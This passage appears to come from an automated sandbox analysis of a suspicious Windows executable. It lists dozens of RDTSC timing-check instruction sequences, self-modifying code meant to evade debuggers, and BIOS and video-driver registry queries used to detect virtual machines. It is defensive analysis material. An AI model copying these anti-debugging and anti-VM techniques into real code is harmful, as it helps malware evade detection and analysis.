                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59439 second address: F5943F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5943F second address: F59443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596D6 second address: F596DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596DC second address: F596E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F10 second address: F59F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC221A94B26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC221A94B26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F25 second address: F59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F29 second address: F59F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jno 00007FC221A94B32h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F47 second address: F59F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A528 second address: F5A53A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC221A94B2Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A53A second address: F5A53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5AAEE second address: F5AAFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C3B4 second address: F5C3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC220745DF6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F601B0 second address: F601B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F601B6 second address: F601D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FC220745DF6h 0x00000015 popad 0x00000016 jmp 00007FC220745DFAh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F6F0 second address: F5F707 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC221A94B32h 0x00000008 jg 00007FC221A94B26h 0x0000000e jne 00007FC221A94B26h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F707 second address: F5F711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F711 second address: F5F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FC221A94B26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F724 second address: F5F73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC220745E02h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F885 second address: F5F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FC221A94B31h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FCA9 second address: F5FCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC220745E05h 0x0000000a jmp 00007FC220745E06h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC220745E0Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FCF9 second address: F5FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE43 second address: F5FE63 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jno 00007FC220745DFEh 0x00000010 jo 00007FC220745DFCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64996 second address: F649B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC221A94B37h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66027 second address: F66043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC220745DF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66043 second address: F66047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C3CE second address: F6C3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC220745E03h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C3E9 second address: F6C3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C58B second address: F6C591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C591 second address: F6C595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CC13 second address: F6CC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D375 second address: F6D379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D379 second address: F6D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D9F6 second address: F6DA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6DA04 second address: F6DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC220745DF6h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BB0 second address: F74BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BBA second address: F74BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BBE second address: F74BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B35h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BDE second address: F74BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F818C4 second address: F818C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F81492 second address: F8149F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8149F second address: F814AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F814AB second address: F814AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F814AF second address: F814B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83D78 second address: F83DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E03h 0x00000009 pop edi 0x0000000a push edi 0x0000000b jmp 00007FC220745DFFh 0x00000010 jbe 00007FC220745DF6h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AEB6 second address: F8AEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AEC2 second address: F8AEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC220745DFCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC220745E18h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FC220745DF6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AEE8 second address: F8AEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AEEC second address: F8AEF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F973C9 second address: F973CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A879 second address: F9A87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA01FF second address: FA0205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9ED30 second address: F9ED35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EFD5 second address: F9F01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC221A94B40h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B33h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F01B second address: F9F03A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F03A second address: F9F040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F040 second address: F9F044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F044 second address: F9F04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F04A second address: F9F068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F068 second address: F9F06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F317 second address: F9F31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F31B second address: F9F32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnp 00007FC221A94B26h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F5D8 second address: F9F5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3EBE second address: FA3EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3EC2 second address: FA3ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3ECA second address: FA3ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD345 second address: FBD363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E07h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE7CF second address: FCE7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC221A94B36h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC221A94B2Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE7FA second address: FCE802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF1D6 second address: FCF1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF4C8 second address: FCF4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF4D7 second address: FCF4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF4DB second address: FCF4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745DF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF4E9 second address: FCF4F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC221A94B26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF4F9 second address: FCF510 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0DE7 second address: FD0E2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC221A94B37h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD24DB second address: FD24F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4E2C second address: FD4E36 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4E36 second address: FD4E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4E3C second address: FD4E4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4E4F second address: FD4E55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5150 second address: FD5159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD539D second address: FD53A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD53A4 second address: FD53AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD53AA second address: FD53AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD53AE second address: FD53F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dh, 1Ah 0x0000000d push dword ptr [ebp+122D2FA7h] 0x00000013 mov edx, dword ptr [ebp+122D1910h] 0x00000019 call 00007FC221A94B29h 0x0000001e jmp 00007FC221A94B35h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FC221A94B28h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD53F0 second address: FD5417 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC220745E00h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC220745DFAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5417 second address: FD545C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC221A94B2Ch 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jns 00007FC221A94B39h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD545C second address: FD5460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E55 second address: FD6E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E5F second address: FD6E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD69A0 second address: FD69A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD69A4 second address: FD69AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561032F second address: 561034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FC221A94B2Bh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561034B second address: 561035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561035C second address: 5610362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF780D second address: EF7811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D51A4B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D4F5BE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EFC629 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F774E8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
